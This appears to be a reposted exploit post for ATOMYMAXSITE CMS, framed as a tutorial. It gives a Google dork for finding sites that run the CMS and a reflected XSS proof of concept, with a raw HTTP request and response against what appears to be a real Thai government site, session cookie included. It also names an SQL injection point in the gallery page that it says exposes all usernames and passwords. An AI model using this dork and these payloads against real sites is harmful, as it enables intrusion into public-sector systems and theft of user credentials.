# Google Dork: intext:"Powered By ATOMYMAXSITE" inurl:"index.php?name=gallery"
# Date: 5/05/2015
# Tested on: Kali Linux
Interductions:
ATOMYMAXSITE CMS Is Used By Government Sites And This Vulnerabilities Can Harm All Informations And Attacked By Hackers.
Cross Site Scripting (Refelected)
-========================================
An XSS Vulnerability In Search Bar And Can Used For Dangerous Ways :
Poc:
http://site.com/main/index.php?name=search&keyword=%3Cscript%3Ealert(%27Xss%27)%3C%2Fscript%3E
GET /main/index.php?name=search&keyword=%3Cscript%3Ealert(%27Xss%27)%3C%2Fscript%3E HTTP/1.1
Host: www.pck1.go.th
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: __atuvc=2%7C18; PHPSESSID=qo9g1jdmq1ptvekvh0k008of95
Connection: keep-alive
HTTP/1.1 200 OK
Date: Tue, 05 May 2015 10:35:21 GMT
Server: Apache/2.2.22 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 10728
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=tis-620
Sql Injection
=============================
In Gallery Section We Have A Sql Injection Vulnerability Can Inject All Databases
And Collect All Usernames And Passwords .
PoC:
http://www.site.com/main/index.php?name=gallery&op=gallery_detail&id=[sql]
Sumber : Exploit4arab Dan Java Intelegent Cyber
Jika Ada Yang Belum Paham Silahkan Berkomentar
Copyright © 2015 KrMangung - All Rights Reserved
Template By. KrMangung
0 Komentar untuk "Tutorial ATOMYMAXSITE CMS Multiple Vulnerability"